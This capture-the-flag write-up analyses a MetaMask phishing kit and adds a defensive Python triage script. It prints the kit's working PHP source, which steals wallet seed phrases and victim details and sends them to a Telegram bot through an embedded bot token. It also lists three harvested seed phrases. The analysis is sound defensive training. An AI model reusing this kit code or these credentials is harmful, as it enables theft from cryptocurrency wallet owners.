
Solution

Hi,

recently I finished the GrabThePhisher challenge on cyberdefenders.org. Let's walk through how to solve its questions.

#1 Which wallet is used for asking the seed phrase?

The phishing site displays 3 wallets:

[Screenshot: the phishing page offering the three wallet options]

I checked the structure of the web site directory. Only one directory contained a suspicious PHP script:

c75-GrabThePhisher\pankewk\metamask\metamask.php

#2 What is the file name that has the code for the phishing kit?

The suspicious file, metamask.php, contains a PHP script that collects data from the victim and information about their machine.

#3 In which language was the kit written?

The script is written in PHP.

#4 What service does the kit use to retrieve the victim's machine information?

Code of the script:

<?php

$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); 
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;
$date = date("m.d.Y"); //aaja


/*
 With love and respect to all the hustler out there,
 This is a small gift to my brothers,
 All the best with your luck,
 
 Regards, 
 j1j1b1s@m3r0
  
  */


    $message = "<b>Welcome 2 The Jungle </b> 
    
<b>Wallet:</b> Metamask
<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";


sendTel($message);  
	
    function sendTel($message){
		$id = "5442785564"; 
        $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10"; 
		$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
		file_get_contents($filename);
        $_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
        @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);	

    }
    
    
    ?>
    

Line 3 of the script shows that the phisher uses the Sypex Geo service (api.sypexgeo.net) to look up the victim's country and city from the connecting IP address:

$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); 

#5 How many seed phrases were already collected?

Line 36 shows that every submitted seed phrase is written to log.txt inside the log directory under the web root ($_SERVER['DOCUMENT_ROOT']/log/log.txt).

        @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);	

The file log.txt contains 3 entries, i.e. 3 seed phrases were collected:

number edge rebuild stomach review course sphere absurd memory among drastic total
bomb stairs satisfy host barrel absorb dentist prison capital faint hedgehog worth
father also recycle embody balance concert mechanic believe owner pair muffin hockey

#6 Write down the seed phrase of the most recent phishing incident?

Line 36 shows that the script appends to the log file (the FILE_APPEND flag), so entries are stored in the order they were received and the most recent seed phrase is the last line of log.txt.
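As an added example (my own triage script, not part of the challenge files or the phishing kit), the following Python automates the steps used for questions 1 to 6: it walks a site directory for PHP files carrying the exfiltration indicators seen above, extracts the geo-lookup host, Telegram bot credentials and log path from the flagged file, and reads the seed-phrase log in append order so the last line is the newest victim. The kit source, the log contents and the site layout it builds are constructed stand-ins that mirror the real kit's structure; the token and chat id are placeholders, not the values from the kit.

```python
"""Triage helper for a PHP phishing kit: locate the kit in a site tree, pull
out its exfiltration indicators, and read the seed-phrase log.

Added example for this write-up; not part of the challenge files or the kit.
KIT_SOURCE and LOG_TEXT are constructed stand-ins (placeholder secrets)."""
import re
import tempfile
from pathlib import Path

# Constructed kit source, structurally similar to metamask.php (placeholder secrets).
KIT_SOURCE = r'''<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$message = "<b>Phrase:</b> <code>" . $_POST["data"] . "</code>";
sendTel($message);
function sendTel($message){
    $id = "0000000000";
    $token = "0000000000:PLACEHOLDER_BOT_TOKEN";
    $filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message);
    file_get_contents($filename);
    $text = $_POST['data']."\n";
    @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
?>'''

# Constructed log content: three 12-word phrases, oldest first (FILE_APPEND order).
LOG_TEXT = ("alpha bravo charlie delta echo foxtrot golf hotel india juliet kilo lima\n"
            "mike november oscar papa quebec romeo sierra tango uniform victor whiskey xray\n"
            "yankee zulu apple banana cherry date elder fig grape honey iris jasmine\n")

# Indicators typical of a credential-harvesting kit; each hit flags the file.
INDICATORS = {
    "reads_post_input": re.compile(r"\$_POST\s*\["),
    "outbound_fetch": re.compile(r"file_get_contents\s*\(\s*\"https?://"),
    "telegram_api": re.compile(r"api\.telegram\.org/bot"),
    "appends_to_log": re.compile(r"file_put_contents\s*\(.*FILE_APPEND"),
}

def scan_site(root):
    """Return {relative path: [indicator names]} for every PHP file under root
    that matches at least one indicator."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        src = path.read_text(errors="replace")
        found = [name for name, rx in INDICATORS.items() if rx.search(src)]
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def extract_iocs(src):
    """Pull the exfiltration endpoints out of the kit's source text."""
    geo = re.search(r'file_get_contents\("https?://([^/"]+)/', src)
    token = re.search(r'\$token\s*=\s*"([^"]+)"', src)
    chat = re.search(r'\$id\s*=\s*"([^"]+)"', src)
    log = re.search(r"file_put_contents\(\$_SERVER\['DOCUMENT_ROOT'\]\.'([^']+)'\.'([^']+)'", src)
    return {
        "geo_service": geo.group(1) if geo else None,
        "telegram_token": token.group(1) if token else None,
        "telegram_chat_id": chat.group(1) if chat else None,
        "log_path": (log.group(1) + log.group(2)) if log else None,
    }

def parse_seed_log(text):
    """Return the non-empty lines of log.txt in write order; because the kit
    uses FILE_APPEND, the last line is the most recent victim."""
    return [line.strip() for line in text.splitlines() if line.strip()]

def triage(root):
    """Run the whole workflow against a site directory."""
    hits = scan_site(root)
    if not hits:
        return None
    kit_rel = max(hits, key=lambda p: len(hits[p]))  # most indicators -> likely kit
    iocs = extract_iocs((Path(root) / kit_rel).read_text(errors="replace"))
    phrases = []
    if iocs["log_path"]:
        log_file = Path(root) / iocs["log_path"].lstrip("/")
        if log_file.exists():
            phrases = parse_seed_log(log_file.read_text())
    return {"kit_file": kit_rel, "indicators": hits[kit_rel], "iocs": iocs,
            "phrase_count": len(phrases),
            "most_recent": phrases[-1] if phrases else None}

def build_sample_site():
    """Create a throwaway site tree mirroring the challenge layout (constructed)."""
    root = Path(tempfile.mkdtemp(prefix="phishkit_"))
    (root / "index.html").write_text("<html>choose your wallet</html>")
    kit_dir = root / "pankewk" / "metamask"
    kit_dir.mkdir(parents=True)
    (kit_dir / "metamask.php").write_text(KIT_SOURCE)
    (root / "log").mkdir()
    (root / "log" / "log.txt").write_text(LOG_TEXT)
    return str(root)

if __name__ == "__main__":
    for key, value in triage(build_sample_site()).items():
        print(f"{key}: {value}")
```

Point triage() at the extracted challenge directory instead of build_sample_site() to reproduce the answers; the regexes are deliberately narrow to this kit's style, so treat a miss as "inspect manually" rather than "clean".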

#7 Which medium had been used for credential dumping?